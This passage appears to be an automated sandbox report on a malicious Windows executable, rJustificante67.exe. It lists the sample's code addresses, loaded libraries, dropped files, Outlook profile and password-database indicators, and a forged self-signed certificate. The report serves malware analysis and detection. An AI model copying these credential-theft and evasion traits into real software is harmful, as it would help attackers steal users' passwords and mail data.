            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E89FD83_2_35E89FD8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E83FD83_2_35E83FD8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E804D03_2_35E804D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E874D03_2_35E874D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E89FD03_2_35E89FD0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8CAD13_2_35E8CAD1
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8F5D73_2_35E8F5D7
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E82DA83_2_35E82DA8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8CFA83_2_35E8CFA8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E856A83_2_35E856A8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E88CA93_2_35E88CA9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8B7AF3_2_35E8B7AF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E81BA03_2_35E81BA0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8A4A03_2_35E8A4A0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8FAA03_2_35E8FAA0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8CFA63_2_35E8CFA6
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E856B83_2_35E856B8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E88CB83_2_35E88CB8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8E2B83_2_35E8E2B8
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E874BF3_2_35E874BF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8FAB03_2_35E8FAB0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E836B73_2_35E836B7
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E824883_2_35E82488
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8BC883_2_35E8BC88
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E879883_2_35E87988
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E84D893_2_35E84D89
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E812803_2_35E81280
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E891803_2_35E89180
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8BC803_2_35E8BC80
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E84D983_2_35E84D98
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E879983_2_35E87998
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8A4983_2_35E8A498
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E82D9A3_2_35E82D9A
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8E7903_2_35E8E790
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E81B913_2_35E81B91
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8A9683_2_35E8A968
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E844683_2_35E84468
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E865683_2_35E86568
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E866683_2_35E86668
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E809603_2_35E80960
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E87E603_2_35E87E60
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8D4603_2_35E8D460
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E844783_2_35E84478
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E824783_2_35E82478
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8E77F3_2_35E8E77F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8D4703_2_35E8D470
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E812703_2_35E81270
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E891713_2_35E89171
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E85B483_2_35E85B48
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E896483_2_35E89648
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8C1483_2_35E8C148
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E83B493_2_35E83B49
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8EC493_2_35E8EC49
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E800403_2_35E80040
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E86B403_2_35E86B40
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E83B583_2_35E83B58
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8EC583_2_35E8EC58
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8A9583_2_35E8A958
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8C1503_2_35E8C150
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E809503_2_35E80950
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E87E503_2_35E87E50
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E852283_2_35E85228
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E883283_2_35E88328
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8322A3_2_35E8322A
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8F1203_2_35E8F120
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8D9273_2_35E8D927
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E832383_2_35E83238
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8D9383_2_35E8D938
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E85B393_2_35E85B39
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8AE303_2_35E8AE30
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E86B303_2_35E86B30
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E896373_2_35E89637
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E849083_2_35E84908
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E870083_2_35E87008
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8C6083_2_35E8C608
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E89B0A3_2_35E89B0A
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8DE003_2_35E8DE00
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E829073_2_35E82907
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E829183_2_35E82918
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8C6183_2_35E8C618
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E883183_2_35E88318
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8521C3_2_35E8521C
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8AE1F3_2_35E8AE1F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E817103_2_35E81710
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E89B103_2_35E89B10
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E800113_2_35E80011
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35E8F1113_2_35E8F111
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA73E03_2_35EA73E0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EADA303_2_35EADA30
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA2BEF3_2_35EA2BEF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA41E03_2_35EA41E0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA0FE03_2_35EA0FE0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EAA1F93_2_35EAA1F9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EAC7F03_2_35EAC7F0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA5DF13_2_35EA5DF1
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA73CF3_2_35EA73CF
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA57C03_2_35EA57C0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA25C03_2_35EA25C0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA97D93_2_35EA97D9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA41D03_2_35EA41D0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA0FD03_2_35EA0FD0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EABDD03_2_35EABDD0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA3BA03_2_35EA3BA0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA09A03_2_35EA09A0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA6DA03_2_35EA6DA0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA8DB93_2_35EA8DB9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA57B13_2_35EA57B1
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EACF883_2_35EACF88
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA51803_2_35EA5180
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA1F803_2_35EA1F80
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA099B3_2_35EA099B
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA83993_2_35EA8399
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA3B903_2_35EA3B90
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA6D903_2_35EA6D90
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EAF1683_2_35EAF168
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EAC5693_2_35EAC569
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA516F3_2_35EA516F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA35603_2_35EA3560
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA03603_2_35EA0360
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA67603_2_35EA6760
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA79793_2_35EA7979
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA9F713_2_35EA9F71
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA4B403_2_35EA4B40
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_35EA19403_2_35EA1940
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: String function: 00402AD0 appears 51 times
            Source: rJustificante67.exeStatic PE information: invalid certificate
            Source: rJustificante67.exe, 00000003.00000002.3926382702.0000000032C07000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rJustificante67.exe
            Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rJustificante67.exe
            Source: rJustificante67.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/17@5/5
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_0040458C GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040458C
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_0040206A
            Source: C:\Users\user\Desktop\rJustificante67.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierministerJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeMutant created: NULL
            Source: C:\Users\user\Desktop\rJustificante67.exeFile created: C:\Users\user\AppData\Local\Temp\nsi4790.tmpJump to behavior
            Source: rJustificante67.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\rJustificante67.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: rJustificante67.exe, 00000003.00000003.2651203990.0000000033EB7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: rJustificante67.exeVirustotal: Detection: 33%
            Source: rJustificante67.exeReversingLabs: Detection: 32%
            Source: C:\Users\user\Desktop\rJustificante67.exeFile read: C:\Users\user\Desktop\rJustificante67.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"Jump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: stempelpudernes.lnk.0.drLNK file: ..\Pictures\muringerne\giggliest.pha
            Source: dinosaurusserne.lnk.0.drLNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre
            Source: C:\Users\user\Desktop\rJustificante67.exeFile written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\premierminister\raastofindvindinger\pulpitical\Furciform\Uligevgten\indberegne.iniJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2422615423.000000000331C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3906023015.000000000185C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_0040620C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0040620C
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 0_2_10002D50 push eax; ret 0_2_10002D7E
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_026AEE60 push eax; iretd 3_3_026AEE65
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_026ACF4A push eax; iretd 3_3_026ACF4D
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_026A38DE push 00000002h; retf 0002h3_3_026A38E0
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_026AEE8C push eax; iretd 3_3_026AEEA9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_3_3584DD8D push es; ret 3_3_3584DD90
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E5162 push es; iretd 3_2_016E5170
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E5174 push ss; retf 3_2_016E51D9
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E6944 pushad ; iretd 3_2_016E6945
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E4938 push 96898B87h; ret 3_2_016E493F
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E2C7F push es; ret 3_2_016E2C87
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E58ED push es; retf 3_2_016E58F3
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E68AE push ss; retf 3_2_016E68CD
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E2C8B push es; ret 3_2_016E2C87
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_016E472A push dword ptr [ecx+7Eh]; ret 3_2_016E4738
            Source: C:\Users\user\Desktop\rJustificante67.exeCode function: 3_2_02669C30 push esp; retf 0268h3_2_02669D55

            Persistence and Installation Behavior

            barindex
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject exactly) which is not trusted by system. 2) Organization 'Bevismateriales' is not a known legitimate company. 3) Email domain 'Carbolxylol.Vau' is highly suspicious and not a legitimate business domain. 4) Large time gap between compilation date (2013) and certificate creation (2024) suggests possible tampering. 5) The OU field 'Tegnvise servicekontrakter' appears to be in Danish/Norwegian while company claims to be in Wales, GB - showing geographical inconsistency. 6) Certificate validation explicitly fails with untrusted root error. 7) While GB as country code is generally trusted, other elements suggest this is being used as a false front. The combination of suspicious domain, unknown organization, self-signing, and validation failure strongly indicates this is a malicious certificate.
            Source: C:\Users\user\Desktop\rJustificante67.exeFile created: C:\Users\user\AppData\Local\Temp\nsv4DEB.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\rJustificante67.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
